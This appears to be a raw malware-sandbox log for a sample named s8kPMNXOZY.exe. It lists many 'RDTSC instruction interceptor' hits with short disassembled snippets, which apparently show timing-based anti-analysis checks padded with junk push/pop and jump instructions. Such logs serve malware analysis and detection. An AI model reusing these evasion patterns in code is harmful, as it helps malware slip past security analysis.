Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B49D07 second address: B49D3E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6FA0B89506h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6FA0B89514h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F6FA0B8950Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007F6FA0B89506h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B49D3E second address: B49D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B49D42 second address: B49D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4FCCF second address: B4FCE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6FA127EBD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4FCE0 second address: B4FCE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4FCE4 second address: B4FCE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4FCE8 second address: B4FCEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4FCEE second address: B4FD11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jmp 00007F6FA127EBE7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4FD11 second address: B4FD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B50038 second address: B5003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B5003C second address: B50076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89516h 0x00000007 jmp 00007F6FA0B89517h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B501D5 second address: B501DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B501DB second address: B501EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jc 00007F6FA0B89506h 0x0000000b pop ecx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B501EA second address: B501F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B501F7 second address: B50202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B50202 second address: B50208 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B505F0 second address: B50604 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89510h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B508BE second address: B508C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B508C4 second address: B508CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B50A33 second address: B50A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B511E2 second address: B511E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B511E8 second address: B511F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B511F0 second address: B51218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F6FA0B89516h 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B58938 second address: B58949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6FA127EBD6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B58949 second address: B5894E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B58BE2 second address: B58BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B58BE8 second address: B58BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B66EAE second address: B66EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA127EBE0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B66EC2 second address: B66EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B66915 second address: B6691B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B6C1EB second address: B6C1F5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6FA0B8950Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B6BEFD second address: B6BF1B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6FA127EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F6FA127EBD8h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 jg 00007F6FA127EBD6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B6BF1B second address: B6BF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B73924 second address: B7392E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6FA127EBD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B79E51 second address: B79E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007F6FA0B89506h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B79D02 second address: B79D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B81F5B second address: B81F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA0B89515h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B81F74 second address: B81F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B81F78 second address: B81F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B81F7E second address: B81F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jl 00007F6FA127EBD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B80BFC second address: B80C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F6FA0B8950Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B80ECE second address: B80ED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B80ED4 second address: B80EE5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6FA0B89506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B80EE5 second address: B80EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B80EEC second address: B80EF6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6FA0B8950Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B8104E second address: B81067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jc 00007F6FA127EBD6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push esi 0x0000000e jnp 00007F6FA127EBD6h 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B81067 second address: B8106B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B86508 second address: B8650C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B8650C second address: B86512 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B86512 second address: B86518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B86518 second address: B8653A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F6FA0B89506h 0x00000009 jmp 00007F6FA0B89517h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B86692 second address: B8669C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6FA127EBDEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B8669C second address: B866A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BC1C21 second address: BC1C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BC1C27 second address: BC1C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BC1C2B second address: BC1C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BC1C31 second address: BC1C5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007F6FA0B89517h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BC1C5F second address: BC1C69 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6FA127EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BC1C69 second address: BC1C6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9BF2A second address: A9BF3A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6FA127EBE2h 0x00000008 jc 00007F6FA127EBD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9BF3A second address: A9BF41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9BF41 second address: A9BF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9BF4F second address: A9BF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9BF55 second address: A9BF6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA127EBDAh 0x00000009 popad 0x0000000a jne 00007F6FA127EBDAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9BF6E second address: A9BF90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA0B89518h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BD82A9 second address: BD82DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE7h 0x00000007 push ecx 0x00000008 jmp 00007F6FA127EBE7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BD7DCB second address: BD7DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: BD7FA3 second address: BD7FBA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6FA127EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6FA127EBDBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA5FF1 second address: CA5FF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA5FF9 second address: CA604B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnc 00007F6FA127EBD6h 0x00000009 jmp 00007F6FA127EBE4h 0x0000000e pop edx 0x0000000f jc 00007F6FA127EBDEh 0x00000015 jg 00007F6FA127EBD6h 0x0000001b pushad 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push edi 0x00000022 jc 00007F6FA127EBD6h 0x00000028 push edi 0x00000029 pop edi 0x0000002a pop edi 0x0000002b jmp 00007F6FA127EBE8h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA604B second address: CA606D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA0B89514h 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA4E16 second address: CA4E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA4E1A second address: CA4E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6FA0B8950Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA4E32 second address: CA4E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA4E36 second address: CA4E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA50DA second address: CA50F2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6FA127EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F6FA127EBD6h 0x00000011 jo 00007F6FA127EBD6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA522D second address: CA5231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA56D5 second address: CA56E3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6FA127EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA56E3 second address: CA56F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89511h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA56F9 second address: CA56FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA56FF second address: CA5705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA5705 second address: CA5711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA5711 second address: CA5725 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F6FA0B89512h 0x0000000c je 00007F6FA0B89506h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA5AE1 second address: CA5B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6FA127EBD6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d jg 00007F6FA127EBD8h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jbe 00007F6FA127EBDCh 0x0000001b jno 00007F6FA127EBE4h 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA5B1C second address: CA5B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CA5B20 second address: CA5B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: CAA09D second address: CAA0BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F6FA0B89506h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F6FA0B8950Dh 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90031 second address: 6E90037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90037 second address: 6E900AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F6FA0B89514h 0x0000000f pushfd 0x00000010 jmp 00007F6FA0B89512h 0x00000015 sub cx, F468h 0x0000001a jmp 00007F6FA0B8950Bh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F6FA0B89516h 0x00000027 mov ebp, esp 0x00000029 jmp 00007F6FA0B89510h 0x0000002e mov eax, dword ptr fs:[00000030h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E900AF second address: 6E900B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E900B3 second address: 6E900B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E900B7 second address: 6E900BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
